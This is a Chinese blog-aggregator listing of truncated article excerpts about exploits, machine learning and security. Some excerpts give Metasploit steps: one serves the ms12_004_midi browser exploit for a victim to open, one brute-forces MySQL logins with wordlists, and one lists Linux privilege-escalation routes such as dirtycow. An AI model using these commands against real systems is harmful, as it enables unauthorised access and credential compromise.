造轮子是那帮搞研究的“科学家”干的事情(类似E&E里的explore),“工程师”的职责是利用已有的东西解决问题(类似E&E里的exploit)。 其次,即使以工程师的角色解决业务问题,要想做好也有很多工作要做,不是“抽特征跑现成模型”能概括的,见下图吧。 作者:lambdaJi链接:https:/ ...
分类:
其他好文 时间:
2018-03-24 14:58:52
阅读次数:
227
在安全圈子里,素有“白帽”、“黑帽”一说。 黑帽子是指那些造成破坏的黑客,而白帽子则是研究安全,但不造成破坏的黑客。 白帽子 均以建设更安全的互联网为己任。 不想拿到“root”的黑客,不是好黑客。漏洞利用代码能够帮助黑客们达成这一目标。黑 客们使用的漏洞利用代码,被称为“exploit”。在黑客的 ...
分类:
Web程序 时间:
2018-03-15 17:51:20
阅读次数:
260
Metasploit自动攻击模块 环境:kali-linux-2017.3-vm-amd64 一、安装postgresql数据库 apt-get install postgresql apt-get install rubygems libpq-dev apt-get install libread ...
分类:
Web程序 时间:
2018-02-16 15:02:16
阅读次数:
257
use exploit/windows/browser/ms12_004_midi 然后设置自己ip: set SRVHOST 192.168.1.3 然后让被害者打开 http://192.168.1.3:8080/E7x2fS5n 然后按下回车键 如果存在漏洞 就写入sessions 执行命令: ...
分类:
其他好文 时间:
2018-02-03 20:53:43
阅读次数:
175
先写个大概 0. dirtycow 常见的情况需要区分CentOS和Ubuntu发行版使用不同的dirtycow exploit. 1. 内核漏洞 不同内核对应不同exploit 2. Pwn suid文件 suid文件为以文件所有者权限运行的文件,文件所有者为root的suid文件值得注意。 3. ...
分类:
系统相关 时间:
2018-01-30 12:54:59
阅读次数:
187
1. use exploit/windows/browser/ms12_004_midi 2. show targets 3. info 4. set SRVHOST 【mine IP】 5. set SRVPORT 【80】 6. set URIPATH / 7. exploit -j 8. et ...
分类:
其他好文 时间:
2018-01-10 18:46:39
阅读次数:
209
search mysql use scanner/mysql/mysql_login show options set RHOSTS set USER_FILE /root/username.lst set PASS_FILE /root/passwords.lst exploit mysql -h ...
分类:
数据库 时间:
2018-01-10 18:37:24
阅读次数:
157
ExplodingCan https://github.com/danigargu/explodingcan An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the N ...
分类:
Web程序 时间:
2018-01-08 01:17:05
阅读次数:
457
NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞。一时间,各路人马开始忙碌起来。厂商忙于声明和修复,有些人忙于利用,而我们则在复现的过程中寻找漏洞的本质。 一.漏洞简介 1.漏洞简介 2016年 ...
分类:
Web程序 时间:
2017-12-17 17:03:58
阅读次数:
355
Collaborative Deep Reinforcement Learning for Joint Object Search CVPR 2017 Motivation: 传统的 bottom-up object region proposals 的方法,由于提取了较多的 proposal,导致 ...
分类:
其他好文 时间:
2017-12-08 23:59:26
阅读次数:
451